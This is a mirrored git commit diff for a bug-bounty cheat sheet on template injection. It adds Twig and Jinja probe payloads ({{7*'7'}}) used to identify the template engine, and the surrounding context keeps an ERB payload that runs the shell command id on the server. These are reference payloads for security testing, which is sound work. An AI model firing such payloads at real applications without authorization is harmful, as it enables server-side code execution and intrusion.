mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-24 20:13:06 +00:00
Update template-injection.md
This commit is contained in:
parent
35a668facf
commit
9eef83ab7d
1 changed files with 17 additions and 1 deletions
|
@ -4,4 +4,20 @@
|
|||
|
||||
```ruby
|
||||
<%=`id`%>
|
||||
```
|
||||
```
|
||||
|
||||
**Twig**
|
||||
|
||||
The following payload should output `49`.
|
||||
|
||||
```
|
||||
{{7*'7'}}
|
||||
```
|
||||
|
||||
**Jinja**
|
||||
|
||||
This payload should output `7777777`.
|
||||
|
||||
```
|
||||
{{7*'7'}}
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue